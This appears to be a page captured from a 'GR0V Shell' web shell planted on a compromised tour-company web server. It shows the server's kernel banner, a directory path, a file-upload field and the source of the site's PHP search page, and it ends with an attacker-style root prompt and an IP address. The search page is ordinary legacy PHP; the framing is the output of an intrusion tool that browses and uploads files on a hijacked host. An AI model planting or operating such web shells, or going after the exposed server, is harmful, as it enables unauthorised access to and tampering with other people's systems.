? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/promice/
File Upload :
Current File : /home/admin/public_html/old/promice/search_kr.php

<? include("header.php");?>
<style type="text/css">
<!--
.style1 {
	color: #FFFFFF;
	font-weight: bold;
}
.style2 {font-weight: bold}
.style3 {
	color: #FFCC00;
	font-weight: bold;
	font-size: 12px;
}
-->
</style>

<table width="1001" border="0" align="center" cellpadding="0" cellspacing="0">
  <!-- fwtable fwsrc="Untitled" fwbase="home.jpg" fwstyle="Dreamweaver" fwdocid = "742308039" fwnested="0" -->
  <tr>
   <td width="423"><img src="images/spacer.gif" width="423" height="1" border="0" alt=""></td>
   <td width="16"><img src="images/spacer.gif" width="16" height="1" border="0" alt=""></td>
   <td width="225"><img src="images/spacer.gif" width="225" height="1" border="0" alt=""></td>
   <td width="315"><img src="images/spacer.gif" width="315" height="1" border="0" alt=""></td>
   <td width="21"><img src="images/spacer.gif" width="21" height="1" border="0" alt=""></td>
   <td width="10"><img src="images/spacer.gif" width="1" height="1" border="0" alt=""></td>
  </tr>

  
  <tr>
    <td colspan="5" bgcolor="#FFFFFF"><div align="center"> 
        <table width="998" border="0" cellspacing="0" cellpadding="0">
          <tr valign="top"> 
            <td width="228">&nbsp;</td>
            <td width="770"><table width="100%" border="0" cellspacing="1" cellpadding="1">
                <tr> 
                  <td height="39" background="images/headtabb.jpg">&nbsp;</td>
                </tr>
                <tr>
                  <td><form id="form1" name="form1" method="post" action="search_akr.php">
                    <table width="897" border="0" cellpadding="00" cellspacing="0" >
                      <tr>
                        <td height="21" colspan="6">Search</td>
                        </tr>
                      <tr>
                        <td width="60" >&nbsp;</td>
                        <td width="155" >Keyword</td>
                        <td width="149" >&nbsp;</td>
                        <td >Cate</td>
                        <td >Order by </td>
                        <td width="151">&nbsp;</td>
                      </tr>
                      <tr>
                        <td >&nbsp;</td>
                        <td ><input name="detail" type="text" id="detail" /></td>
                        <td >&nbsp;</td>
                        <td ><?php
						
$sql2 = "select * From article_category_kr";
$result2 = mysql_query($sql2);
$Num_Rows2 = mysql_num_rows($result2);
$result2 = mysql_query($sql2);
echo "<select name=article_category_id id=article_category_id class=input>";
echo "<option value=0>Choose type article";
While($row2= mysql_fetch_array($result2)){
$typecode  = $row2["id"];
$typename = $row2["category_name"];

?>
                                                <option value=<? echo "$typecode"; ?> ><? echo "$typecode"; ?>-<? echo "$typename "; ?> 
                                                <? 
   } 
   echo "</option></select>";
   ?>
                                                &nbsp;</td>
                        <td ><select name="order" id="order">
                          <option selected="selected">Select</option>
                          <option value="asc">Ascending</option>
                          <option value="desc">Descending</option>
                                                </select></td>
                        <td>&nbsp;</td>
                      </tr>
                      <tr>
                        <td >&nbsp;</td>
                        <td >&nbsp;</td>
                        <td >&nbsp;</td>
                        <td width="136" >&nbsp;</td>
                        <td width="116" >&nbsp;</td>
                        <td rowspan="2"><input name="Submit" type="submit" class="inputxx" id="Submit" value="Search" /></td>
                      </tr>
                      <tr>
                        <td >&nbsp;</td>
                        <td height="20" >&nbsp;</td>
                        <td >&nbsp;</td>
                        <td >&nbsp;</td>
                        <td >&nbsp;</td>
                      </tr>
                    </table>
                  </form>
                  </td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>
                    <center>
                      <br>
                      <br>
                    </center>
                    </td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                </tr>
              </table></td>
          </tr>
        </table>
      </div></td>
   <td><img src="images/spacer.gif" width="1" height="25" border="0" alt=""></td>
  </tr>
</table><? include("footer.php");?>

</body>
</html>

T1KUS90T
  root-grov@210.1.60.28:~$